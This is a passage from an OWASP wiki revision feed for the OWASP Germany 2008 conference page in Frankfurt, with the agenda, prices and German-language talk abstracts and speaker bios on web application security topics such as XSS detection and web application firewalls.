 | style=&amp;quot;width:40%; background:#a0c0e0 &amp;quot; align=left&amp;quot; | [[#Server- und Browser-basierte XSS Erkennung | '''Server- und Browser-basierte XSS Erkennung''']]&lt;br /&gt;
''Martin Johns, Uni Passau, und Jeremias Reith, Uni Hamburg''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:30-16:10 || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Security-by-Design durch Einsatz von MVC | '''Security-by-Design durch Einsatz von MVC''']] &lt;br /&gt;
''Mirko Richter, SecureNet GmbH''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#a0c0e0 &amp;quot; align=left&amp;quot; | [[#Cross-Site Scripting Filter Evasion | '''Cross-Site Scripting Filter Evasion''']] &lt;br /&gt;
''Alexios Fakos, n.runs AG''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:10-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Kaffeepause&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:10 || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Learning of Positive Security Models for Web-Applications | '''Learning of Positive Security Models for Web-Applications''']]&lt;br /&gt;
''Christian Bockermann''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#a0c0e0 &amp;quot; align=left&amp;quot; | [[#Sicherheit von Rich Internet Applications | '''Sicherheit von Rich Internet Applications''']]&lt;br /&gt;
''fukami, SektionEins GmbH''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:10-17:50|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software | '''Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software''']]&lt;br /&gt;
''N.N., SAP AG (angefragt), Dr. Boris Hemkemeier, Commerzbank''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:50-18:00|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | '''Schlusswort'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot; ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:#4058A0&amp;quot; | OWASP Germany&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Anmeldung und Preise ==&lt;br /&gt;
&lt;br /&gt;
Anmeldeinformationen in Kürze an dieser Stelle.&lt;br /&gt;
&lt;br /&gt;
'''Preise:'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; width=&amp;quot;112&amp;quot; height=&amp;quot;13&amp;quot; | „normaler“ Teilnehmer&lt;br /&gt;
| width=&amp;quot;60&amp;quot; | 149 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | OWASP-Mitglied&lt;br /&gt;
 | 99 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | Studenten&lt;br /&gt;
 | kostenlos&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Preise zzgl. MwSt.&lt;br /&gt;
&lt;br /&gt;
== Sponsoring ==&lt;br /&gt;
&lt;br /&gt;
Es besteht die Möglichkeit zum Ausstellen und zum Logo-Sponsoring. [http://www.owasp.org/index.php/Image:OWASP_D_2008_Sponsoren_Info.pdf Infos für Sponsoren hier.]&lt;br /&gt;
&lt;br /&gt;
== Abstracts ==&lt;br /&gt;
&lt;br /&gt;
=== OWASP Overview (in Englisch) ===&lt;br /&gt;
An introduction to  Open Web Application Security Project (OWASP), a worldwide free and open community focused on improving the security of application software. Our mission is to make application security &amp;quot;visible,&amp;quot; so that people and organizations can make informed decisions about application security risks.&lt;br /&gt;
&lt;br /&gt;
''Über Sebastien Deleersnyder''&lt;br /&gt;
&lt;br /&gt;
Sebastien started the successful Belgian OWASP Chapter and performed several public presentations on web application and web services security. Sebastien specialises in (web) applicatoin security, combining his software development and information security experience. He is currently OWASP Foundation board member and responsible for the Telindus application security offering in Belgium.&lt;br /&gt;
&lt;br /&gt;
=== Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen ===&lt;br /&gt;
&lt;br /&gt;
''Über Maximilian Dermann''&lt;br /&gt;
&lt;br /&gt;
Maximilian Dermann ist selbstständiger IT-Security Architect. Er war bei Lufthansa Technik für mehr als fünf Jahre für die Sicherheit und den Betrieb der zuletzt über 60 eBusiness Applikationen zuständig. Seine Aufgaben beinhalteten u.a. die Erstellung von Detailrichtlinien für sichere Softwareentwicklung und den sicheren Betrieb der Applikationen, die Koordination von Sicherheitsaudits, das Design und die Koordination des Betriebs der Sicherheitsinfrastruktur sowie die Verantwortung für das Betriebsbudget. Als Projektleiter und Architekt hat er mehrere Projekte im Bereich IT-Sicherheit und IT-Infrastruktur durchgeführt.  Maximilian Dermann war als Berater und Softwareentwickler im Bereich Webapplikationssicherheit an insgesamt vier Online-Banking und -Brokerage Projekten beteiligt. Er ist aktives Mitglied des OWASP German Chapters und einer der Co-Autoren des Best Practices Guide für Web Application Firewalls.&lt;br /&gt;
&lt;br /&gt;
=== Kickstart für sichere Webanwendungen ===&lt;br /&gt;
Der Ansatzpunkte und Maßnahmen zur Absicherung von Webanwendungen gibt es viele - doch wo fange ich an und was ist der für meinen ganz speziellen Fall beste Weg? &lt;br /&gt;
&lt;br /&gt;
Der Vortrag gibt einen kompakten Überblick über die verschiedenen Ansatzpunkte zur Absicherung von Webanwendungen, diskutiert Vor- und Nachteile und stellt Erfahrungen aus der Praxis dar.&lt;br /&gt;
&lt;br /&gt;
''Über Thomas Schreiber''&lt;br /&gt;
&lt;br /&gt;
Thomas Schreiber ist Geschäftsführer der SecureNet GmbH und Berater für die Sicherheit von Webanwendungen. Seit vielen Jahren beschäftigt er sich mit Sicherheitsaspekten von Webanwendungen und hat mittlerweile Hunderte von Webanwendungen auf ihre Sicherheit hin untersucht. Er ist Coautor des vom Bundesamt für Sicherheit in der Informationstechnik (BSI) herausgegebenen &amp;quot;Maßnahmenkatalog und Best Practices für die Sicherheit von Webanwendungen&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== SOA Sicherheitsarchitektur ===&lt;br /&gt;
Der Einsatz von SOA erfordert ein neues Sicherheitsmodell, da viele altbewährte Lösungen für Benutzermanagement, Authentifizierung, Autorisierung usw. nicht mehr funktionieren. Auch kommen neue Anforderungen hinzu, wie z.B. die Föderation und die Integration mit PKI-Systemen. Dieser Vortrag zeigt die spezifischen Sicherheitsprobleme von SOA von einer Architekturperspektive. Wichtige Standards für SOA, wie Policy Enforcement Point (PEP), Policy Decision Point (PDP), SAML, XACML, und deren konkrete Benutzung werden besprochen. Die Bedeutung von Rollenmodelle und die flexible Einbindung von solchen in SOAs wird auch behandelt.&lt;br /&gt;
&lt;br /&gt;
''Über Bruce Sams''&lt;br /&gt;
&lt;br /&gt;
Dr. Bruce Sams ist ausgebildeter Physiker und Geschäftsführer von OPTIMAbit GmbH, einer führenden Beratungsfirma im Bereich Anwendungssicherheit (Architecture Review, Penetration Test, Single-Sign-On, PKI und mehr). Dr. Sams ist Autor vieler Fachartikel.&lt;br /&gt;
&lt;br /&gt;
=== OWASP Best Practices zum Einsatz von Web Application Firewalls ===&lt;br /&gt;
Der Vortrag stellt den vom OWASP Germany Chapter erstellten ''OWASP Best Practices zum Einsatz von Web Application Firewalls'' vor.&lt;br /&gt;
&lt;br /&gt;
Das Dokument wendet sich vornehmlich an technische Entscheider - speziell Betriebsverantwortliche, Sicherheitsverantwortliche, Applikationseigner (Fachabteilung, technisch Anwendungsverantwortlicher), die den Einsatz einer WAF im Unternehmen evaluieren. Spezielles Augenmerk wurde – wo immer möglich – auf die Darstellung von Aufwandsabschätzungen gelegt – auch im Vergleich zu möglichen Alternativen wie z. B. Änderungen im Sourcecode.&lt;br /&gt;
&lt;br /&gt;
''Über Alex Meisel''&lt;br /&gt;
&lt;br /&gt;
Bereits in seiner Informatik-Diplomarbeit beschäftigte Alex Meisel sich mit der Abwehr und der Rückverfolgung von sog. Denial-of-Service- Attacken. Bei einem Schweizer IT-Dienstleister war er als Experte für Web-Sicherheit tätig; anschließend betreute er beim größten europäischen Internet-Knotenpunkt LINX (London Internet Exchange) Mitglieder in Fragen der Netzwerk-Sicherheit.&lt;br /&gt;
&lt;br /&gt;
Nach seiner drei-jährigen Tätigkeit als Senior Consultant für Design und Implementierung von großen Web-Farmen inkl. Security-Audits bei einem führenden Hersteller von Web-Servern wechselte er als Leiter Projektmanagement zur Realisierung von Web-Applikations-Lösungen im SAP-Umfeld zum gleichen Fortune-500-Unternehmen.&lt;br /&gt;
&lt;br /&gt;
=== Measuring the Security of Web Applications ===&lt;br /&gt;
Software ist unsicher! &amp;quot;Security Researcher&amp;quot; publizieren nahezu täglich Sicherheitsmängel in Softwareapplikationen in einschlägigen Mailinglisten und Internetforen. Und das bereits seit Jahrzehnten. &lt;br /&gt;
Softwaresicherheit wird immer wichtiger mit der zunehmenden Vernetzung und Kritikalität der Daten. Daher reservieren Softwarehersteller oft signifikante (aber trotzdem begrenzte) Budgets zur sicheren Softwareentwicklung. Um diese Budgets werben Dienstleister und Hersteller von verschiedensten Sicherheitsprodukten. Oft halten diese Dienste und Produkte nicht das, was das Marketing verspricht. &lt;br /&gt;
Für Softwarehersteller stellt sich die Frage in welche Prozesse und Technologien in welchem Umfang investiert werden sollte: &amp;quot;Wieviel Sicherheitszuwachs bekommt man für wieviel Aufwand&amp;quot;? In diesem Vortrag beleuchte ich Wege und Irrwege, um dieses Kosten-Nutzen-Verhältnis abzuschätzen und zu optimieren. &lt;br /&gt;
&lt;br /&gt;
''Über Sebastian Schinzel''&lt;br /&gt;
&lt;br /&gt;
Sebastian Schinzel ist seit mehr als fünf Jahren Entwickler und Sicherheitsberater. Sein Fokus liegt auf Sicherheitsuntersuchungen und sicherer Softwareentwicklung von Geschäftsapplikationen. Bei Virtual Forge führt er Sicherheitsuntersuchungen von SAP-Geschäftsapplikationen durch und berät SAP-Kunden zu sicherer Softwareentwicklung. &lt;br /&gt;
&lt;br /&gt;
=== Security-by-Design durch Einsatz von MVC ===&lt;br /&gt;
::to be completed&lt;br /&gt;
''Über Mirko Richter''&lt;br /&gt;
::to be completed&lt;br /&gt;
&lt;br /&gt;
=== Server- und Browser-basierte XSS Erkennung ===&lt;br /&gt;
Wenn man sich HTTP Verkehr von Web Applikationen unter dem Gesichtspunkt des Erkennens von eingeschleustem JaveScript-codes betrachtet, fallen zwei einfache Zusammenhänge ins Auge:&lt;br /&gt;
&lt;br /&gt;
- Die Menge aller von einer Web Applikation legitim verwendeten JavaScripte ist stark eingeschränkt, was sowohl in Anzahl wie auch in&lt;br /&gt;
Varianten betrifft, und ist somit maschinell erfassbar. &lt;br /&gt;
&lt;br /&gt;
- Es gibt einen klaren Zusammenhang zwischen den Parametern eines eingehenden HTTP Requests und den (eventuellen) reflected XSS Scripten, die in der resultierenden Web Seite enthalten sind.&lt;br /&gt;
&lt;br /&gt;
Basierend auf diesen beiden Beobachtungen wurden an den Universitäten Hamburg und Passau zwei Detektoren entwickelt, die in der Lage sind XSS Angriffe zu erkennen. Der Vortrag wird beide Erkennungsmethoden vorstellen und aufzeigen wie wir diese auf der Server-seite [1] sowie im Browser [2] umgesetzt haben.&lt;br /&gt;
&lt;br /&gt;
Links:&lt;br /&gt;
&lt;br /&gt;
[1] Martin Johns, Bjoern Engelmann, Joachim Posegga: XSSDS:&lt;br /&gt;
Server-side detection of cross-site scripting attacks, in Annual&lt;br /&gt;
Computer Security Applications Conference (ACSAC '08), December 2008,&lt;br /&gt;
http://www.informatik.uni-hamburg.de/SVS/papers/2008_ACSAC_johns_Engelmann_Posegga_XSSDS.pdf&lt;br /&gt;
&lt;br /&gt;
[2] Jeremias Reith, noXSS, Firefox extension, http://www.noxss.org/&lt;br /&gt;
&lt;br /&gt;
''Über Martin Johns und Jeremias Reith''&lt;br /&gt;
&lt;br /&gt;
Martin Johns ist wissenschaftlicher Mitarbeiter an der Universität Passau, wo er im Bereich Web- und Software-Sicherheit forscht und gerade den finalen Schliff an seine Doktorarbeit bringt. Vor seinem Eintritt in die akademische Welt, wirkte er als Software Entwickler in verschiedenen Firmen, wie z.B. Infoseek Deutschland, TC Trustcenter und der SAP AG.&lt;br /&gt;
&lt;br /&gt;
Jeremias Reith studiert seit 2002 Informatik mit dem Schwerpunkt IT Sicherheit an der Universität Hamburg und arbeitet ausserdem als System-Engineer für ein international agierendes Medienhaus. Momentan schreibt er seine Diplomarbeit mit dem Thema &amp;quot;Reliable reflective XSS detection on the client side&amp;quot; und widmet sich in seiner Freizeit der Firefox-Erweiterung noXSS welche vor XSS-Angriffen schützen soll.&lt;br /&gt;
&lt;br /&gt;
=== Cross-Site Scripting Filter Evasion ===&lt;br /&gt;
Die Darstellung seiner Individualität ist einer der Schlüsselfaktoren, um im Web 2.0 Business erfolgreich tätig zu sein. Aus diesem Grund erlauben viele Web 2.0 Anwendungen Ihren Benutzern sich freizügig zu präsentieren. Aber diese Praxis erhöht die Risikoanfälligkeit von Cross-Site Scripting Schwachstellen. Der Vortrag untersucht diverse Blacklist- und Whitelist-Ansätze und wie solche Filterregeln umgangen werden können.&lt;br /&gt;
&lt;br /&gt;
''Über Alexios Fakos''&lt;br /&gt;
&lt;br /&gt;
Alexios Fakos ist nach sieben Jahren in der Softwareentwicklung zum deutschen IT Sicherheitsdienstleister n.runs AG gewechselt.&lt;br /&gt;
Zurzeit ist Herr Fakos als Senior Security Consultant tätig. Seine Schwerpunkte sind unter anderem: Penetrationstests, Quellcodeanalysen und Schulungen für Softwareentwickler und -tester. Neben seiner beruflichen Tätigkeit hat Herr Fakos einen Lehrauftrag mit dem Thema Web Security am Fachbereich Mathematik, Naturwissenschaften und Datenverarbeitung (MND) an der Fachhochschule Giessen-Friedberg.&lt;br /&gt;
&lt;br /&gt;
=== Learning of Positive Security Models for Web-Applications ===&lt;br /&gt;
&lt;br /&gt;
In vielen Bereichen haben maschinelle Lernverfahren bereits einen großen Einfluß genommen. SPAM-Bekämpfung und Anomalie-basierte Intrusion-Detection wären ohne KI-Ansätze wie Text-Klassifizierung, Clustering oder Outlier-Detection nicht möglich. Im Bereich der Web-Sicherheit gibt es dagegen bisher nur sehr wenige wissenschaftliche Arbeiten, maschinelles Lernen zu verwenden. Auf der anderen Seite werben immer mehr Hersteller von Web Application Firewalls mit selbst-lernenden Systemen ohne Details preiszugeben.&lt;br /&gt;
&lt;br /&gt;
Der Vortrag gibt einen Überblick über die (wenigen) wissenschaftlichen Arbeiten zum Thema Web-Sicherheit aus dem Blickwinkel des maschinellen Lernens und stellt ein Projekt vor, das versucht, positive Sicherheitsmodelle für WAF-Systeme aus HTTP-Traffic automatisiert zu erstellen.&lt;br /&gt;
&lt;br /&gt;
''Über Christian Bockermann''&lt;br /&gt;
&lt;br /&gt;
Christian Bockermann ist derzeit wissenschaftlicher Mitarbeiter an der Technischen Universität Dortmund. Nach seiner Diplomarbeit zum Thema &amp;quot;Anomalie-Erkennung in Web-Anwendungen&amp;quot; promoviert er zur Zeit am Lehrstuhl für künstliche Intelligenz im Bereich Web-Sicherheit.&lt;br /&gt;
Neben einigen Projekten zur Web-Sicherheit betreibt er die Seite jwall.org [http://jwall.org], die einen Teil der Tools bereitstellt, die im Rahmen der Forschungsarbeiten bisher entwickelt wurden.&lt;br /&gt;
&lt;br /&gt;
=== Sicherheit von Rich Internet Applications ===&lt;br /&gt;
In dem Vortrag soll es um die besonderen Risiken gehen, die beim Einsatz von gängigen Rich Internet Applications vor allem auf Basis von Flash/AIR und Silverlight im Gegensatz zu klassischen Webanwendungen existieren. Ausserdem werden einige Hinweise gegeben, wie diese Anwendungen auditiert werden können und wo dabei die besonderen Schwierigkeiten liegen.&lt;br /&gt;
&lt;br /&gt;
''Über fukami''&lt;br /&gt;
:fukami arbeitet als Senior Security Consultant für die [http://sektioneins.de SektionEins GmbH] in Köln und hat Spass am Gerät.&lt;br /&gt;
&lt;br /&gt;
=== Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software ===&lt;br /&gt;
::to be completed&lt;br /&gt;
''Über Boris Hemkemeier''&lt;br /&gt;
::to be completed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zurück zur [[Germany|OWASP Germany Homepage]].&lt;br /&gt;
&lt;br /&gt;
[[Category:Germany]]&lt;/div&gt;</summary>
		<author><name>Fukami</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=43473</id>
		<title>OWASP Germany 2008 Conference</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=43473"/>
				<updated>2008-10-17T12:37:28Z</updated>
		
		<summary type="html">&lt;p&gt;Fukami: überschriebene Änderungen wieder eingefügt&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Die OWASP Germany 2008 Konferenz wird am 25.11.08 mit einer Vorabendveranstalung am 24.11.08 in Frankfurt stattfinden.&lt;br /&gt;
(The OWASP Germany 2008 conference will be held on November 25, 2008 in Frankfurt.)&lt;br /&gt;
&lt;br /&gt;
Veranstaltungsort: Steigenberger Airport Hotel (per Bahn und Flieger gleichermaßen gut zu erreichen)&lt;br /&gt;
&lt;br /&gt;
Zurück zur [[Germany|OWASP Germany Homepage]].&lt;br /&gt;
&lt;br /&gt;
== Agenda ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| width=&amp;quot;96&amp;quot; height=&amp;quot;16&amp;quot; | 9 00-9:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; width=&amp;quot;231&amp;quot; colspan=&amp;quot;2&amp;quot; | Registrierung&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 9:30-9:45&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Begrüßung&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 9:45-10:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | OWASP Overview (in Englisch)&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Sebastien Deleersnyder, OWASP Foundation Board Member&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 10:30-11:15&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen &lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot;  valign=&amp;quot;top&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; valign=&amp;quot;top&amp;quot; | Max Dermann, Lufthansa Technik AG&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 11:15-11:30&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Kaffeepause&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 11:30-12:15&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Kickstart für sichere Webanwendungen&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Thomas Schreiber, SecureNet&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 12:15-13:00&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | NN&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | &amp;amp;nbsp;&lt;br /&gt;
 | &amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 13:00-14:00&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Mittagspause / Essen&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 14:00-14:45&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Vorstellung des OWASP Best Practices Guide zum Einsatz von Web Application Firewalls&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Alex Meisel, Art of Defence&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 5 min&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Raumsuche&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Tracks: 30 Min Präsentation , 10 Min Diskussion + Raumsuche&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Track 1&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Track 2&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 14.50-15:30&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Measuring the Security of Web Applications&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Server-side Detection of XSS&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | Sebastian Schinzel, Virtual Forge&lt;br /&gt;
 | Martin Johns, Uni Passau&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 15:30-16:10&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Security-by-Design durch Einsatz von MVC&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Cross-Site Scripting Filter Evasion &lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | Mirko Richter, SecureNet GmbH&lt;br /&gt;
 | Alexios Fakos, n.runs AG&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#C0C0C0;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | 16:10-16:30&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Kaffeepause&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;32&amp;quot; | 16:30-17:10&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Learning of Positive Security Models for Web-Applications&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; | Sicherheit von Rich Internet Applications&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;15&amp;quot; | &amp;amp;nbsp;&lt;br /&gt;
 | Christian Bockermann&lt;br /&gt;
 | fukami, SektionEins GmbH&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; height=&amp;quot;16&amp;quot; | 17:10-17:50&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#CCFFFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | Tom Schröer, SAP AG (angefragt), Dr. Boris Hemkemeier, Commerzbank&lt;br /&gt;
&lt;br /&gt;
|- style=&amp;quot;background-color:#99CCFF;font-size:12pt&amp;quot;  valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| height=&amp;quot;16&amp;quot; | 17:50-18:00&lt;br /&gt;
|style=&amp;quot;font-weight:bold&amp;quot; colspan=&amp;quot;2&amp;quot; | Schlußwort&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Anmeldung und Preise ==&lt;br /&gt;
&lt;br /&gt;
Anmeldeinformationen in Kürze an dieser Stelle.&lt;br /&gt;
&lt;br /&gt;
Preise:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; width=&amp;quot;112&amp;quot; height=&amp;quot;13&amp;quot; | „normaler“ Teilnehmer&lt;br /&gt;
| width=&amp;quot;60&amp;quot; | 150 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | OWASP-Mitglied&lt;br /&gt;
 | 100 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
